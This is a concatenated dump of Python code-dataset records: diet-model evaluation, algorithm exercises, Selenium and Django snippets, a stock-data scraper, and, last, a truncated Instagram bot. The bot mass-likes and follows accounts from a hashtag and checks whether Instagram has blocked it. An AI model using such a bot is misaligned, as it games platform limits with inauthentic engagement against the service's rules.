np.hstack([first_column, SCST_data_np, last_column])\n\n# meal_hit_score(SCST_data_np.astype('int'), category_data)\n# dish_hit_score(SCST_data_np.astype('int'), category_data)\navg_SCST_meal_hit = np.stack(np.apply_along_axis(meal_hit_score, axis = 1, arr = SCST_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\navg_SCST_dish_hit = np.stack(np.apply_along_axis(dish_hit_score, axis = 1, arr = SCST_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\n\n# 4) MIXER\nMIXER_result = pd.read_csv('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/MIXER_data_np.csv', index_col = 0)\nMIXER_data_np = np.array(MIXER_result)\n\n# MIXER_data_np = food_to_token(MIXER_result, nutrient_data)\n# first_column = np.repeat(first_element, MIXER_data_np.shape[0]).reshape(-1, 1)\n# last_column = np.repeat(last_element, MIXER_data_np.shape[0]).reshape(-1, 1)\n# MIXER_data_np = np.hstack([first_column, MIXER_data_np, last_column])\n\n# meal_hit_score(MIXER_data_np.astype('int'), category_data)\n# dish_hit_score(MIXER_data_np.astype('int'), category_data)\navg_MIXER_meal_hit = np.stack(np.apply_along_axis(meal_hit_score, axis = 1, arr = MIXER_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\navg_MIXER_dish_hit = np.stack(np.apply_along_axis(dish_hit_score, axis = 1, arr = MIXER_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\n\n# 5) TFR\nTFR_result = pd.read_csv('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/TFR_data_np.csv', index_col = 0)\nTFR_data_np = np.array(TFR_result)\n\n# TFR_data_np = food_to_token(TFR_result, nutrient_data)\n# first_column = np.repeat(first_element, TFR_data_np.shape[0]).reshape(-1, 1)\n# last_column = np.repeat(last_element, TFR_data_np.shape[0]).reshape(-1, 1)\n# TFR_data_np = np.hstack([first_column, TFR_data_np, last_column])\n\n# meal_hit_score(TFR_data_np.astype('int'), category_data)\n# dish_hit_score(TFR_data_np.astype('int'), category_data)\navg_TFR_meal_hit = np.stack(np.apply_along_axis(meal_hit_score, axis = 1, arr = TFR_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\navg_TFR_dish_hit = np.stack(np.apply_along_axis(dish_hit_score, axis = 1, arr = TFR_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\n\n# 
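# The cell below scores every diet row-wise: get_score_vector maps a token
# sequence to a nutrient vector, and get_reward_ver2(...)[:, 0] is the scalar
# RDI reward that gets averaged per method. A minimal sketch, assuming the
# helpers keep the signatures already used above:
#   scores = np.apply_along_axis(get_score_vector, axis=1, arr=diet_data_np, nutrient_data=nutrient_data)
#   rdi_score = np.apply_along_axis(get_reward_ver2, axis=1, arr=scores, done=0)[:, 0].mean()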
%%\n'''\nRDI score 점수 책정\n'''\nreal_score = np.apply_along_axis(get_score_vector, arr = diet_data_np, axis = 1, nutrient_data = nutrient_data)\nreal_RDI_score = np.apply_along_axis(get_reward_ver2, arr = real_score, axis = 1, done = 0)[:, 0].mean()\n\n'''\n여기에서 MIP는 지금 보상이 잘못 계산되고 있음을 유념하라.\n>> 내가 작성한 보상을 계산하는 함수는 index 기반이라 nutrient_data['energy']가 아니라 nutrient_data.iloc(axis)[1] 와 같이 각 영양소를 조회함.\n>> 그러나 MIP로 생성한 식단은 순서가 지멋대로이므로 이렇게 index기반으로 계산할 시 잘못된 보상을 계산하게 됨.\n'''\nMIP_score = np.apply_along_axis(get_score_vector, arr = MIP_data_np, axis = 1, nutrient_data = nutrient_data)\nMIP_RDI_score = np.apply_along_axis(get_reward_ver2, arr = MIP_score, axis = 1, done = 0)[:, 0].mean()\n\nSCST_score = np.apply_along_axis(get_score_vector, arr = SCST_data_np, axis = 1, nutrient_data = nutrient_data)\nSCST_RDI_score = np.apply_along_axis(get_reward_ver2, arr = SCST_score, axis = 1, done = 0)[:, 0].mean()\n\nMIXER_score = np.apply_along_axis(get_score_vector, arr = MIXER_data_np, axis = 1, nutrient_data = nutrient_data)\nMIXER_RDI_score = np.apply_along_axis(get_reward_ver2, arr = MIXER_score, axis = 1, done = 0)[:, 0].mean()\n\nTFR_score = np.apply_along_axis(get_score_vector, arr = TFR_data_np, axis = 1, nutrient_data = nutrient_data)\nTFR_RDI_score = np.apply_along_axis(get_reward_ver2, arr = TFR_score, axis = 1, done = 0)[:, 0].mean()\n\n\n# %%\n'''\nData Merge for Barplotting\n'''\nreal_reward = np.apply_along_axis(get_reward_ver2, axis = 1, arr = nutrient_real, done = 0)[:, 2].sum(axis = 0).reshape(1, -1)\nMIP_reward = np.ones([1, 13]) * 1072 # MIP의 결과는 만점이므로 그냥 모든 영양소 기준에 대해 만족한 식단의 갯수를 1072로 고정\n\nreward_dist_stack = np.append(real_reward, reward_dist_stack, axis = 0) # 방법론 별 보상 분포\nreward_dist_stack = np.append(reward_dist_stack, MIP_reward, axis = 0) # 방법론 별 보상 분포\n\ntypes_of_nutrient = np.array([['calorie', 'protein', 'fiber', 'vitaA', 'vitaC', 'vitaB1', 'vitaB2', 'calcium', 'iron', 'sodium', 'linoleic', r'$\\alpha$-linolenic', 'macroRatio']]).T\ntypes_of_method = ['real', 'TFR', 'SCST', 'MIXER', 'MIP']\n\nconat_rds_all = np.empty([0, 3]) # value, nutrient, method 3개 축으로 구성됨\nfor i in range(reward_dist_stack.shape[0]):\n concat_rds = np.append(reward_dist_stack[i, :].reshape(-1, 1), types_of_nutrient, axis = 1)\n concat_rds = np.append(concat_rds, np.repeat(types_of_method[i], concat_rds.shape[0]).reshape(-1, 1), axis = 1)\n conat_rds_all = np.vstack([conat_rds_all, concat_rds])\n\nreward_dist_stack_df = pd.DataFrame(conat_rds_all)\nreward_dist_stack_df.columns = np.array(['count', 'nutrient', 'method'])\nreward_dist_stack_df['count'] = reward_dist_stack_df['count'].astype('float')\nreward_dist_stack_df['nutrient'] = reward_dist_stack_df['nutrient'].astype('str')\n\n# %%\n'''\nBarplotting\n'''\ncolors = [\"#d62728\", \"#1f77b4\"]\n# sns.set(style = 'darkgrid')\nsns.set_palette(sns.color_palette(colors))\n\nnut_ = reward_dist_stack_df[(reward_dist_stack_df['method'] == \"real\") | (reward_dist_stack_df['method'] == \"TFR\")]\nnut_list = [nut_]\nplt.xticks(rotation = 45)\n\n# colors = [\"#d62728\", \"#1f77b4\", \"#ff7f0e\", \"#2ca02c\", \"black\"]\n# nut0 = reward_dist_stack_df[(reward_dist_stack_df['nutrient'] == \"calorie\") | (reward_dist_stack_df['nutrient'] == \"protein\") | (reward_dist_stack_df['nutrient'] == \"macroRatio\")]\n# nut1 = reward_dist_stack_df[(reward_dist_stack_df['nutrient'] == \"vitaA\") | (reward_dist_stack_df['nutrient'] == \"vitaC\") | (reward_dist_stack_df['nutrient'] == \"vitaB1\") | (reward_dist_stack_df['nutrient'] == \"vitaB2\")]\n# nut2 = 
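# The plotting loop further down draws one grouped barplot per nutrient subset
# and labels every bar with its height: p.get_bbox().bounds yields (left,
# bottom, width, height) for each patch, and ax.annotate writes the count just
# above it, rotated 90 degrees.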
reward_dist_stack_df[(reward_dist_stack_df['nutrient'] == \"fiber\") | (reward_dist_stack_df['nutrient'] == \"calcium\") | (reward_dist_stack_df['nutrient'] == \"iron\") | (reward_dist_stack_df['nutrient'] == \"sodium\")]\n# nut3 = reward_dist_stack_df[(reward_dist_stack_df['nutrient'] == \"linoleic\") | (reward_dist_stack_df['nutrient'] == r\"$\\alpha$-linolenic\")]\n# nut_list = [nut0, nut1, nut2, nut3]\n\nfor i, val in enumerate(nut_list):\n plot_name = \"reward_distributoin_compare_nut_.png\"\n # plot_name = \"reward_distributoin_compare_nut_\" + str(i) + \".png\"\n ax = sns.barplot(x = 'nutrient', y = 'count', hue = 'method', data = val)\n\n for p in ax.patches:\n left, bottom, width, height = p.get_bbox().bounds\n ax.annotate(\"%.1d\" % height, (left + width/2, height), ha='center', va='center', fontsize = 7, rotation = 90, xytext = (0, 10), textcoords = 'offset points')\n\n ax.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n figure_dir = '/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/figures/' + plot_name\n plt.savefig(figure_dir, bbox_inches='tight')\n plt.clf()\n# %%\n'''\nReward Ploting\n'''\n\n## training plot over time-through rewards 그리기\nfrom os import listdir\nfrom os.path import isfile, join\n\n# 단일 방법론\n# dir_file_name = '/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/SCST_eb=None_bs=None_lr=0.001_epoch=5000_rewards.csv'\n# plot_reward(dir_file_name)\n\n# 복수의 방법론 비교\n# reward plot 그릴 파일 담기\nfiles = [f for f in listdir('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results') if isfile(join('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results', f))]\n# keyword1 = \"SCST\"\n# keyword2 = \"MIXER\"\n# keyword3 = \"bs=10\"\n# filtered_files = [a_file for a_file in files if keyword1 in a_file or keyword2 in a_file or keyword3 in a_file]\nkeyword = \"plot\"\nfiltered_files = [a_file for a_file in files if keyword in a_file]\n\n# filtered_files 리스트에 담긴 파일 순서 바꾸기\nmy_order = [1, 2, 0]\nrearranged_files = [filtered_files[order] for order in my_order] \n\n# results로 현재 디렉토리 (cwd) 디렉토리 변경 (change directory: chdir)\nos.chdir(\"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results\")\n\ntrunc_range = 1\nreward_over_methods_df = pd.DataFrame([])\nfor each_file in rearranged_files:\n method = each_file.split('_eb')[0]\n tmp = pd.read_csv(each_file)\n tmp['method'] = np.repeat(method, tmp.shape[0])\n\n # observation을 trunc_range로 잘라서 각 range별로 reward를 보고 싶다면\n # tmp2 = tmp.iloc(axis = 0)[tmp['reward'].groupby(tmp['reward'].index // trunc_range).agg(['min', 'median', 'mean', 'max']).dropna().index * trunc_range + (trunc_range - 1)]\n # tmp2.reset_index(inplace = True)\n # reward_over_methods_df = pd.concat([reward_over_methods_df, tmp2])\n\n # 순전하게 모든 observation에서의 reward를 보고 싶다면\n reward_over_methods_df = pd.concat([reward_over_methods_df, tmp])\n\nreward_over_methods_df.to_csv('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/total_rewards.csv')\n\nplot_reward('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/total_rewards.csv')\n# %%\n","sub_path":"Code/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":17704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"446485002","text":"import sys\nsys.stdin = open('input.txt','r')\n\n# from itertools import permutations\nT = int(input())\nfor tc in range(1,T+1):\n N 
=int(input())\n town = [[0]*101 for _ in range(101)]\n Town = [[]]\n WnH = []\n l = list(map(int,input().split()))\n\n C = 0\n for a in range(0,(N+2)*2,2):\n if a == 0 :\n WnH.append(('일',l[a],l[a+1]))\n elif a == 2:\n WnH.append(('집',l[a],l[a+1]))\n else:\n C += 1\n Town.append((C, l[a], l[a + 1]))\n print(WnH)\n print(Town)\n\n\n\n'''\n customers = [a for a in range(N)]\n nod = [[] for _ in range(N+1)]\n for a in range(1,N+1):\n for e in range(1,N+1):\n if a != e: nod[a].append(e)\n \n\n # cusper = list(permutations(customers))\n # print(cusper)\n print(nod)\n \n for cs in range(1,N+1):\n sc,si,sj = Town[cs] # 시작하는 고객번호, 고객좌표\n lc, li, lj = WnH[1] # 끝나는 고객번호, 고객좌표\n stack = [(sc,si,sj)]\n visit = [(sc,si,sj)]\n workdis = abs(WnH[0][1] - si) + abs(WnH[0][2] - sj) # 일~시작고객 거리\n mindis = 0xfffff\n while stack:\n if sc == lc and : # 마지막 고객 방문 \n workdis += abs(WnH[0][1] - si) + abs(WnH[1][2] - sj) # 마지막고객 ~ 거리\n \n for nxt in nod[sc]:\n nc,ni,nj = nxt,Town[nxt][1],Town[nxt][2]\n if (nc,ni,nj) not in visit:\n if workdis + (abs(ni - si) + abs(nj - sj)) < mindis:\n workdis += (abs(ni - si) + abs(nj - sj))\n visit.append(nc,ni,nj)\n stack.append(sc,si,sj)\n sc, si, sj = nc,ni,nj\n break\n else: sc,si,sj = stack.pop()\n\n print(visit)\n print(mindis)\n print()\n\n'''\n'''\n C = 0\n for a in range(0,(N+2)*2,2):\n if a == 0 :\n town[l[a]][l[a+1]] = '일'\n elif a == 2:\n town[l[a]][l[a + 1]] = '집'\n else:\n C += 1\n town[l[a]][l[a+1]] = C\n\n for t in town : print(t)\n print('\\n,\\n')\n'''","sub_path":"Problem/SWEA/D5/1247(F).py","file_name":"1247(F).py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"75563023","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[8]:\n\n\nfrom selenium import webdriver\nimport time\nimport math \nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ndef calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\n\ntry: \n link = \"http://suninjuly.github.io/explicit_wait2.html\"\n browser = webdriver.Chrome()\n browser.get(link)\n book = browser.find_element_by_css_selector(\"button\")\n price = WebDriverWait(browser, 15).until(\n EC.text_to_be_present_in_element((By.ID, \"price\"), \"$100\"))\n book.click()\n x = int(browser.find_element_by_css_selector(\"#input_value\").text)\n answer = calc(x)\n ans = browser.find_element_by_css_selector(\"#answer\")\n ans.send_keys(str(answer))\n submit = browser.find_element_by_css_selector(\"[type = 'submit']\")\n submit.click()\n \nfinally:\n time.sleep(10)\n browser.quit()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"2_4__2.py","file_name":"2_4__2.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"197915302","text":"# Homework 2 - 6/19/20\n# Lists, Loops, Conditionals\n\n# Testing:\n# Modify the tets calls below each function for early testing. 
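# (each function below already has a sample call printed right after its
# definition, so running the file shows those early results immediately.)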
Then, in Terminal, simply type:\n# python hw2_submission.py\n\n# Final Scoring:\n# When you finish, navigate to your code directory in Terminal and run with python hw2_tests.py\n# This uses your code in this file and prints test results.\n\n# The list you will use for your testing is this one here:\nnumList = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048, 4096, 8192]\nwordList = [\"hmm\", \"why\", \"does\", \"it\", \"smell\", \"like\", \"burnt\", \"toast\", \"here\"]\nmixedList = [\"going\", 2, \"raise\", 8, \"baby\", \"geese\"]\n\n# (Easy) Write the code for two functions, manualAbs() and smartAdd().\n\n# manualAbs()\n# Takes a number num, and returns the absolute value.\n# For this question, you are NOT allowed to use the pre-existing abs() function.\n# Hint: Use if statements.\ndef manualAbs(num):\n # Your code starts here. \n if (num > 0):\n return num\n else:\n return (num*-1)\n\n# Test call to the function.\nprint ( manualAbs(-40) )\n\n\n# sumList() \n# Adds the values of all values in a list, and returns that sum.\n# Hint: Use a loop.\ndef sumList(list):\n # Your code starts here\n # list = numList by my default setup.\n sum = 0\n for x in list:\n sum += x\n return sum\n\n# Test call to the function.\nprint ( sumList(numList) )\n\n\n\n# (Medium) Write the code for the function, cutShort().\n\n# cutShort()\n\n# Part 1 - Build it to work for a list of strings\n# Create a new list of all the words in wordList with length greater than n.\n# Finish by returning the new list. Don't modify the old list.\n# Hint: The length of a string can be found with len()\ndef cutShort(list, n):\n # Your code starts here \n newList = []\n for x in list:\n if (isinstance(x, int)):\n if (x > n):\n newList.append(x)\n elif (isinstance(x, str)):\n if (len(x) > n):\n newList.append(x)\n return newList\n\n\nprint ( cutShort(wordList, 3) )\n\n# Part 2 - Modify the above function to work for a mixed list of both strings and integers, \n# where integers less than or equal to n are cut.\n# Hint: Use if statements and this resource:\n# https://www.w3schools.com/python/ref_func_isinstance.asp\n\n# print ( cutShort(mixedList, 2))","sub_path":"Homework2/hw2_key.py","file_name":"hw2_key.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"358980060","text":"import torch\n\n\ndef eval_ppl(ce_loss, mask):\n \"\"\"\n :param ce_loss: CrossEntropyLoss with shape (batch size, length)\n :param resp: Response with same shape as ce_loss\n :param pad_id: Pad ID\n :return: Sentence-level average ppl value\n \"\"\"\n mask = mask.float()\n lens = mask.sum(dim=-1)\n loss = (ce_loss * mask).sum(dim=-1)\n loss /= (lens + 1e-5)\n return torch.exp(loss)\n","sub_path":"TCFC/eval/metrics/eval_ppl.py","file_name":"eval_ppl.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"271110669","text":"#coding=utf-8\n\nimport gzip\nimport http.cookiejar\nimport urllib.request\nimport urllib.parse\nimport json\nimport os\nimport time\nimport datetime\n\ndef getOpener(head):\n # deal with the Cookies\n cj = http.cookiejar.CookieJar()\n pro = urllib.request.HTTPCookieProcessor(cj)\n opener = urllib.request.build_opener(pro)\n header = []\n for key, value in head.items():\n elem = (key, value)\n header.append(elem)\n opener.addheaders = header\n return opener\n\ndef ungzip(data):\n try: # 尝试解压\n print('正在解压.....')\n data = gzip.decompress(data)\n 
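        # gzip.decompress inflates the whole gzip payload in one call; when the
        # response was never compressed it raises, and the except branch below
        # simply returns the data untouched. Typical round trip in this script:
        #   data = ungzip(op.read()).decode('gbk')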
print('解压完毕!')\n except:\n print('未经压缩, 无需解压')\n return data\ndef writeFile(fname,data):\n filename = r'../tmp/'+fname+'.txt'\n if os.path.exists(filename):\n message = '文件 + '+filename +' 已存在,跳过'\n else:\n message = '文件 + '+filename +' 不存在,新建'\n \n f=open(filename,'w')\n f.write(data)\n f.close()\n print ('文件:'+fname+' 处理完毕。')\n'''\n读取抓取数据开始日期\n如果不存在该日期,从10日前开始读取\n如果存在从文件内日期开始读取\n读到今天\n'''\nheader = {\n 'Connection': 'Keep-Alive',\n 'Accept': '*/*',\n 'Accept-Language': 'zh-CN,zh;q=0.8',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36',\n 'Accept-Encoding': 'gzip, deflate',\n 'Host': '',\n 'Referer' : ''\n}\nshUrl = 'http://query.sse.com.cn/infodisplay/showTradePublicFile.do?dateTx='#2015-09-28\nszUrl = ['http://www.szse.cn/szseWeb/common/szse/files/text/jy/jy',#150923.txt\n 'http://www.szse.cn/szseWeb/common/szse/files/text/smeTxt/gk/sme_jy',#150708.txt\n 'http://www.szse.cn/szseWeb/common/szse/files/text/nmTxt/gk/nm_jy']#150902.txt\nstartFileName = r'startDay.txt'\nendDay = datetime.datetime.now()\n\nif os.path.exists(startFileName):\n print('日期配置文件存在,开始读取')\n f=open(startFileName,'rt')\n s = f.readline()\n f.close()\n if s!='':\n print('将从日期:'+s+' 开始读取')\n timeArray = time.strptime(s, \"%Y%m%d\")\n timeStamp = int(time.mktime(timeArray))\n fromDay = datetime.datetime.utcfromtimestamp(timeStamp)\n else:\n print('日期配置文件为空,将从10日前日期开始读取')\n fromDay = endDay - datetime.timedelta(days = 10)\nelse:\n print('日期配置文件不存在,将从10日前日期开始读取')\n fromDay = endDay - datetime.timedelta(days = 10)\n\nendDay = endDay + datetime.timedelta(days = 1)\n\nwhile fromDay.strftime(\"%Y%m%d\")!=endDay.strftime(\"%Y%m%d\"):\n print(fromDay.strftime(\"%Y%m%d\"))\n \n '''\n 循环上面日期\n 抓取上证,深证,中小创交易龙虎榜数据\n\n 如果内容不为空\n\n 文件不存在\n\n 写入文件\n '''\n #抓取上证龙虎榜数据\n url = shUrl + fromDay.strftime(\"%Y-%m-%d\")\n print('读取上证龙虎榜\\n'+url)\n\n header['Host'] = 'query.sse.com.cn'\n header['Referer'] = 'http://www.sse.com.cn/disclosure/diclosure/public/'\n\n try:\n opener = getOpener(header)\n op = opener.open(url)\n data = op.read()\n data = data.decode()\n jsonData = json.loads(data)\n outData = ''\n if (jsonData['fileContents']!=''):\n for info in jsonData['fileContents']:\n outData= outData+ info+'\\n'\n writeFile(fromDay.strftime(\"%Y-%m-%d\")+'_上证',outData)\n except:\n print(fromDay.strftime(\"%Y-%m-%d\")+'跳过')\n\n \n #抓取深证,中小创交易龙虎榜数据\n i=1\n for url in szUrl:\n if(i==1):\n name = '深证'\n elif(i==2):\n name = '中小板'\n else:\n name = '创业板'\n url = url + fromDay.strftime(\"%y%m%d\")+'.txt'\n print('读取'+name+'龙虎榜\\n'+url)\n header['Host'] = 'www.szse.cn'\n header['Referer'] = 'http://www.szse.cn'\n try:\n opener = getOpener(header)\n op = opener.open(url)\n data = op.read()\n data = ungzip(data)\n data = data.decode('gbk')\n writeFile(fromDay.strftime(\"%Y-%m-%d\")+'_'+name,data)\n except:\n print(fromDay.strftime(\"%Y-%m-%d\")+'跳过')\n i=i+1\n\n \n fromDay = fromDay + datetime.timedelta(days = 1)\n\n#最后更新日期为当前日期\nprint('设置最新日期')\nfromDay = fromDay - datetime.timedelta(days = 1)\nf=open(startFileName,'w')\nf.write(fromDay.strftime(\"%Y%m%d\"))\nf.close()\nprint('读取完成')\n","sub_path":"tiger_list/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":4619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"516830788","text":"from rest_framework import serializers\nfrom django.contrib.auth.models import User\nfrom api.models import Category, Product\n\nfrom api.models import Category, Product, 
Client\n\n\nclass CategorySerializer1(serializers.Serializer):\n id = serializers.IntegerField(read_only=True)\n name = serializers.CharField()\n\n def create(self, validated_data):\n return Category.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.name = validated_data.get('name', instance.name)\n instance.save()\n return instance\n\n\nclass ClientSerializer(serializers.Serializer):\n id = serializers.IntegerField(read_only=True)\n name = serializers.CharField()\n\n def create(self, validated_data):\n return Client.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.name = validated_data.get('name', instance.name)\n instance.save()\n return instance\n\n\nclass CategorySerializer2(serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = ('id', 'name')\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n category = CategorySerializer2(read_only=True)\n category_id = serializers.IntegerField(write_only=True)\n\n class Meta:\n model = Product\n fields = ('id', 'name', 'price', 'description', 'category', 'category_id',)\n\n\n\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = User\n fields = ['id', 'username', 'email', 'password']\n extra_kwargs = {'password': {'write_only': True}}\n\n def create(self, validated_data):\n user = User.objects.create_user(**validated_data)\n return user\n\n\nclass AdminSerializer(serializers.ModelSerializer):\n client = CategorySerializer2(read_only=True)\n client_id = serializers.IntegerField(write_only=True)\n\n class Meta:\n model = Product\n fields = ('id', 'name', 'client', 'client_id',)\n","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"34533521","text":"# Download Hipparcos data from\n# http://vizier.u-strasbg.fr/cgi-bin/VizieR?-source=I/239/hip_main\n# Get HIP, RAhms, DEdms, RA(ICRS)(RA in deg), DE(ICRS)(DE in deg),\n# Plx (mas), pmRA(mas/yr; mu_alpha*cos(de)), pmDE(mas/yr),\n# Also get SIMBAD computed distance, Galactic, J2000, B1950 and\n# Ecl. J2000 values; positions in decimal degrees. 
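# (pmRA here is mu_alpha*cos(DE), so both proper-motion components are in
# mas/yr on the sky, and Plx is the parallax in mas.)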
Ouput is \"|\"\n# separated values.\n# se = \"\"\" \"\"\"\nimport pytpm\nfrom pytpm import tpm, convert\n\nraj2000 = []\ndej2000 = []\nglat = []\nglon = []\n\ni = 1\nfor line in open(\"/home/phn/Downloads/hipparcos.tsv\", \"rt\"):\n if i <= 40:\n i += 1\n continue\n cols = line.split(\"|\")\n if cols[0].strip() == \"\":\n continue\n glon.append(float(cols[0]))\n glat.append(float(cols[1]))\n raj2000.append(float(cols[2]))\n dej2000.append(float(cols[3]))\n rab1950 = float(cols[4])\n deb1950 = float(cols[5])\n elon2000 = float(cols[6])\n elat2000 = float(cols[-1])\n rahip = float(cols[10])\n dehip = float(cols[11])\n plx = float(cols[12])\n pmra = float(cols[13])\n pmde = float(cols[14])\n \n\n\n#import timeit\n# \n#t= timeit.Timer(\n# 'convert.convert(ra=raj2000, de=dej2000, s2=tpm.TPM_S04)',\n# se)\n \n","sub_path":"doc/examples/hip_convert.py","file_name":"hip_convert.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"422218114","text":"from time import sleep\nfrom random import randint\nimport Setup\nimport Get_followers_from_people\nimport time\nimport datetime\nfrom selenium.webdriver.common.keys import Keys\nimport MySQLdb\nimport Main\n\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\n\nimport pymysql\nimport traceback\ntime_start_ban_like = 0\ntime_start_ban_follow = 0\n\n\ndef get_hashtag_page(browser):\n try:\n browser.get('https://www.instagram.com/explore/tags/' + Setup.hashtag + '/')\n sleep(2)\n body_elem = browser.find_element_by_tag_name('body')\n for _ in range(randint(0, 3)):\n body_elem.send_keys(Keys.END)\n sleep(2)\n body_elem.send_keys(Keys.HOME)\n sleep(2)\n\n browser.find_element_by_xpath('//article/div[2]/div/div/div/a/div/div[2]').click()\n sleep(2)\n\n\n\n except Exception as e:\n print(\"type error: \" + str(e))\n\n\ndef check_ban_like(browser):\n global time_start_ban_like\n try:\n if Setup.like < Setup.like_limit:\n url = browser.current_url\n try:\n sleep(2)\n browser.find_element_by_xpath('//button/span[contains(@class, \"glyphsSpriteHeart__filled__24__red_5 u-__7\")]')\n print(\"You already liked this post\")\n except:\n WebDriverWait(browser, 20).until(EC.element_to_be_clickable((By.XPATH, '//button/span[contains(@class, \"glyphsSpriteHeart__outline__24__grey_9 u-__7\")]')))\n browser.find_element_by_xpath('//button/span[contains(@class, \"glyphsSpriteHeart__outline__24__grey_9 u-__7\")]').click()\n print(\"Set like\")\n sleep(randint(5, 10))\n try:\n browser.get(url)\n print(\"Checking like..\")\n WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.XPATH, '//button/span[contains(@class, \"glyphsSpriteHeart__outline__24__grey_9 u-__7\")]')))\n print(datetime.datetime.now())\n print(\"It's impossible to put any like, you are being banned:\")\n print(\"The program will continue to just follow people\")\n Get_followers_from_people.like_blocked = True\n time_start_ban_like = time.time()\n Setup.like = 25\n\n except:\n Setup.like += 1\n print(\"Like ok\")\n except:\n browser.find_element_by_xpath('//a[text()=\"Next\"]').click()\n sleep(randint(2, 4))\n\n\ndef like(browser):\n global like_blocked\n try:\n if Setup.like < Setup.like_limit:\n try:\n browser.find_element_by_xpath('//button/span[contains(@class, \"glyphsSpriteHeart__filled__24__red_5 u-__7\")]')\n # print(\"You already liked this post\")\n except:\n WebDriverWait(browser, 
20).until(EC.element_to_be_clickable((By.XPATH, '//button/span[contains(@class, \"glyphsSpriteHeart__outline__24__grey_9 u-__7\")]')))\n browser.find_element_by_xpath('//button/span[contains(@class, \"glyphsSpriteHeart__outline__24__grey_9 u-__7\")]').click()\n Setup.like += 1\n sleep(randint(5,10))\n except:\n browser.find_element_by_xpath('//a[text()=\"Next\"]').click()\n sleep(randint(2, 4))\n\n\ndef follow(browser):\n try:\n if Setup.follow <= Setup.follow_limit:\n\n try:\n browser.find_element_by_xpath('//div/button[text()=\"Follow\"]').click()\n # ('Saving name')\n user = browser.find_element_by_xpath('//a[contains(@class, \"FPmhX notranslate nJAzx\")]').get_attribute(\"title\")\n timenow = time.time()\n\n conn = MySQLdb.connect(host=Setup.host, port=Setup.port, user=Setup.user, passwd=Setup.password, db=Setup.db)\n a = conn.cursor()\n a.execute(\"\"\"\n INSERT INTO FOLLOWED \n (name, timePassed, profile_get_followers, attempt_get_followed_back) \n VALUES \n (%s, %s, %s, 0)\"\"\", (str(user), timenow, Setup.hashtag))\n conn.commit()\n conn.close()\n\n Setup.follow += 1\n sleep(randint(5, 10))\n\n except:\n print('Impossible following because you already follow this user')\n sleep(randint(2, 5))\n browser.find_element_by_xpath('//a[text()=\"Next\"]').click()\n print(\"skip to next one\")\n\n\n\n elif Setup.follow > Setup.follow_limit:\n print(\"You exceeded the follow limit : (\", Setup.follow_limit, \") for this session\")\n\n\n except: # Exception as e:\n sleep(1)\n\n #print(\"type error: \" + str(e))\n\n\ndef check_ban_follow(browser, conn):\n global time_start_ban_follow\n try:\n if Setup.follow <= Setup.follow_limit:\n\n try:\n url = browser.current_url\n browser.find_element_by_xpath('//div/button[text()=\"Follow\"]').click()\n followed_name = browser.find_element_by_xpath('//a[contains(@class, \"FPmhX notranslate nJAzx\")]').get_attribute(\"title\")\n timenow = time.time()\n sleep(15)\n try:\n browser.get(url)\n WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.XPATH, '//span/button[text()=\"Follow\"]')))\n print(datetime.datetime.now())\n Get_followers_from_people.follow_blocked = True\n time_start_ban_follow = time.time()\n Setup.follow = 35\n except:\n print(\"Follow ok\")\n conn = MySQLdb.connect(host=Setup.host, port=Setup.port, user=Setup.user, passwd=Setup.password, db=Setup.db)\n a = conn.cursor()\n a.execute(\"\"\"\n INSERT INTO FOLLOWED \n (name, timePassed, 